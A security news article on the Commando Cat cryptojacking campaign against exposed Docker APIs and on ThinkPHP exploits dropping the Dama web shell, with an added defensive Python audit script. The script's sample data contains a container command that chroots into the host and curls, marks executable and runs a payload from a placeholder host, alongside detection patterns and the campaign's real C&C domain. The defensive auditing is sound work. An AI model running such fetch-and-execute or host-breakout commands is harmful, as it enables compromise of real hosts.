The threat actor known as Commando Cat has been linked to an ongoing cryptojacking campaign that leverages poorly secured Docker instances to deploy cryptocurrency miners for financial gain.
"The attackers used the cmd.cat/chattr docker image container that retrieves the payload from their own command-and-control (C&C) infrastructure," Trend Micro researchers Sunil Bharti and Shubham Singh said in a Thursday analysis.
Commando Cat, so named for its use of the open-source Commando project to generate a benign container, was first documented earlier this year by Cado Security.

The attacks are characterized by the targeting of misconfigured Docker remote API servers to deploy a Docker image named cmd.cat/chattr, which is then used as a basis to instantiate a container, break out of its confines using the chroot command, and gain access to the host operating system.
The final step entails retrieving the malicious miner binary from a C&C server ("leetdbs.anondns[.]net/z") with a curl or wget command, by means of a shell script. The binary is suspected to be ZiggyStarTux, an open-source IRC bot based on the Kaiten (aka Tsunami) malware.
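The chain above depends on two conditions a defender can audit directly: a Docker daemon reachable over plain TCP, and a container started with settings that let a process escape to the host (privileged mode, the host root bind-mounted, a chroot or downloader in its command). The following Python is an added example, not code from Trend Micro, Cado Security or this article. The daemon.json and `docker inspect` samples are constructed; the image name cmd.cat/chattr is the one named above, and the download URL in the sample command is a placeholder, not a real C&C.

```python
"""Audit a Docker host for the two conditions the attack chain above depends on:
a daemon reachable over plain TCP, and containers launched with settings that
let a process escape to the host (privileged, host root bind-mounted, chroot).
Added example; not code from Trend Micro, Cado Security or The Hacker News."""
import json
import re

# Image named in the Trend Micro analysis quoted above.
KNOWN_BAD_IMAGES = {"cmd.cat/chattr"}

# Constructed sample daemon.json (hypothetical host): API listening on TCP without TLS.
SAMPLE_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
})

# Constructed, abbreviated `docker inspect` output (hypothetical containers).
# The download URL in the second container is a placeholder, not a real C&C.
SAMPLE_INSPECT_JSON = json.dumps([
    {
        "Name": "/web",
        "Config": {"Image": "nginx:1.25", "Cmd": ["nginx", "-g", "daemon off;"]},
        "HostConfig": {"Privileged": False, "PidMode": "",
                       "Binds": ["/srv/www:/usr/share/nginx/html:ro"]},
    },
    {
        "Name": "/chattr",
        "Config": {"Image": "cmd.cat/chattr",
                   "Cmd": ["chroot", "/host", "sh", "-c",
                           "curl -fsSL http://c2.invalid/z -o /tmp/z && chmod +x /tmp/z && /tmp/z"]},
        "HostConfig": {"Privileged": True, "PidMode": "host", "Binds": ["/:/host"]},
    },
])


def audit_daemon(daemon_json: str) -> list[str]:
    """Flag TCP listeners that lack tlsverify or that bind every interface."""
    cfg = json.loads(daemon_json)
    findings = []
    for host in cfg.get("hosts", []):
        if not host.startswith("tcp://"):
            continue  # unix:// and fd:// sockets are local-only
        if not cfg.get("tlsverify"):
            findings.append(f"{host}: remote API without tlsverify")
        addr = host[len("tcp://"):].rsplit(":", 1)[0]
        if addr in ("", "0.0.0.0", "[::]"):
            findings.append(f"{host}: bound to all interfaces")
    return findings


def breakout_indicators(container: dict) -> list[str]:
    """Return the host-breakout signals present in one `docker inspect` entry."""
    cfg = container.get("Config") or {}
    hc = container.get("HostConfig") or {}
    found = []
    if cfg.get("Image") in KNOWN_BAD_IMAGES:
        found.append(f"known cryptojacking image {cfg['Image']}")
    if hc.get("Privileged"):
        found.append("privileged container")
    if hc.get("PidMode") == "host":
        found.append("shares host PID namespace")
    # Binds are "src:dst[:opts]"; a source of "/" exposes the whole host filesystem.
    for bind in hc.get("Binds") or []:
        if bind.split(":", 1)[0] == "/":
            found.append(f"host root bind-mounted ({bind})")
    cmd = " ".join(cfg.get("Cmd") or [])
    if re.search(r"\bchroot\b", cmd):
        found.append("chroot in container command")
    if re.search(r"\b(curl|wget)\b", cmd):
        found.append("downloader in container command")
    return found


def audit_containers(inspect_json: str) -> dict[str, list[str]]:
    """Map container name -> indicators, for containers with at least one."""
    report = {}
    for c in json.loads(inspect_json):
        hits = breakout_indicators(c)
        if hits:
            report[c.get("Name", "?").lstrip("/")] = hits
    return report


if __name__ == "__main__":
    for line in audit_daemon(SAMPLE_DAEMON_JSON):
        print("daemon:", line)
    for name, hits in audit_containers(SAMPLE_INSPECT_JSON).items():
        print(f"container {name}:", "; ".join(hits))
```

On a real host, feed `audit_daemon` the contents of /etc/docker/daemon.json and `audit_containers` the output of `docker inspect $(docker ps -aq)`. One caveat: the listener is often configured with a `-H` flag in the systemd unit rather than in daemon.json, so an empty `hosts` key does not by itself prove the API is local-only; check `ss -ltnp` for port 2375/2376 as well.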
"The significance of this attack campaign lies in its use of Docker images to deploy cryptojacking scripts on compromised systems," the researchers said. "This tactic allows attackers to exploit vulnerabilities in Docker configurations while evading detection by security software."

The disclosure comes as Akamai revealed that years-old security flaws in ThinkPHP applications (e.g., CVE-2018-20062 and CVE-2019-9082) are being exploited by a suspected Chinese-speaking threat actor to deliver a web shell dubbed Dama, as part of a campaign that has been underway since October 17, 2023.

"The exploit attempts to retrieve additional obfuscated code from another compromised ThinkPHP server to gain initial foothold," Akamai researchers Ron Mankivsky and Maxim Zavodchik said. "After successfully exploiting the system, the attackers will install a Chinese language web shell named Dama to maintain persistent access to the server."

The web shell is equipped with several advanced capabilities to gather system data, upload files, scan network ports, escalate privileges, and navigate the file system, the latter of which allows threat actors to perform operations such as file editing, deletion, and timestamp modification for obfuscation purposes.
"The recent attacks originated by a Chinese-speaking adversary highlight an ongoing trend of attackers using a fully fledged web shell, designed for advanced victim control," the researchers noted. "Interestingly, not all targeted customers were using ThinkPHP, which suggests that the attackers may be indiscriminately targeting a broad range of systems."
Some sections of this article are sourced from:
thehackernews.com

